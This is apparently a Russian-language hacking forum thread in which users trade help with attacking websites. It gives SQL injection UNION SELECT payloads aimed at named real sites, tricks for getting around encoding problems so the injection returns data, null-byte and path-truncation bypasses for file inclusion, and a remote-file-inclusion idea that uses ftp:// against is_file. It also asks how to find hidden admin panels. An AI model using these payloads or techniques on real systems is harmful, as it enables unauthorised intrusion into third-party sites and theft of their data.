Ну как же мы без тебя то не догадались у? Ошибка возникает из за того что значения лимита не может быть отрицательным вот и всё, естественно инъекцией и не пахло, я просто показал человеку как изменяется характер ошибки в результате тех или иных действий, хотелось чтобы он сам мозгами шевельнул, а не ты ему сказал, надеюсь это ясно!!!
Люди есть такая вот проблема: Если сайт шопа при попытке вывести багнутый столбец: http://www.*****.co.uk/cart.php?c=-99999245+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- Меня редиректит на страничку с картинкой на которой написано: Sorry shop is turned off. Помогите, может есть какойто другой способ вывода? Спасибо
Вывод в тайтле http://www.groovycart.co.uk/cart.php?c=-9+union+select+1,version(),3,4,5,6,7,8,9,10,1,2,1,1,1,1,1,1,19,20,1,2,3,24,5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,1,2,3,4,5,6,7,8,9,10,11,12,13--+
Тебе нужно обрезать error.htm..это можно обрезать нуль байтом..вот так Code: file.txt%00 Если magic_quotes_gpc ON то тебе нужно юзать замену нулбайту..вот тут описание..http://forum.antichat.ru/thread98525.html Хотя тебе уже давали ссылку....а ты даже не обратил внимание.. Запрос с заменой нул байта будем примерно таким Code: file.txt...258-266+ точек Где file.txt это любой файл в директории tmpl ЧИТАЙ
Code: http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,2382,2383,2384,2385/* где-то фильтр, пилит version() etc, на дает пробиться к from+information_schema
http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,unhex(hex(version())),2383,2384,2385/*
ILYAtirtir, хотя бы объяснили человеку почему так! =\ Nosfer, это не фильтр... Это проблемы с кодировкой... Так иногда бывает =\ для устранения этого можно применить как выше написали: UNHEX(HEX(version())) ну или вместо version() что вы хотите вывести или AES_DECRYPT(AES_ENCRYPT(version(),1),1) А вообще почитайте SQL injection полный FAQ Некоторые вопросы отпадут =)
есть ссылка вида http://site.ru/file=123 Подгружается фаил 123.txt Как можно попробовать PHP подгрузить? пробовал %00 он режет %0 пробовал %25 ничего не происходит..
мде, ты как себе это вообще представляешь? Это не режет %0 а маджик квотс он, поэтому ошибка появляется такая. Обход сдесь: https://forum.antichat.ru/thread98525.html если не вышло, то не судьба
Вообщем есть файл PHP: if(is_file($config['document_root'].'/templates/'.$config['template'].'/before.php')){ include($config['document_root'].'/templates/'.$config['template'].'/before.php'); } перменные не опред..то есть их можно свободно передать... Тут возможен только инклуд при Magic OFF ибо функция is_file не уязвима к замене нулл байта...Риальне ли каким нить макаром обмануть is_file ?...
da, ishi temu slipa pro obxod file_exists naskol'ko ya pomnyu ftp:// rabotaet s is_file, sledovatel'no RFI
возник такой вопрос... каким образом можно найти админку сайта? т.е если стандартные пути не подходят (xxx.xx/admin.php, xxx.xx/login.php....)
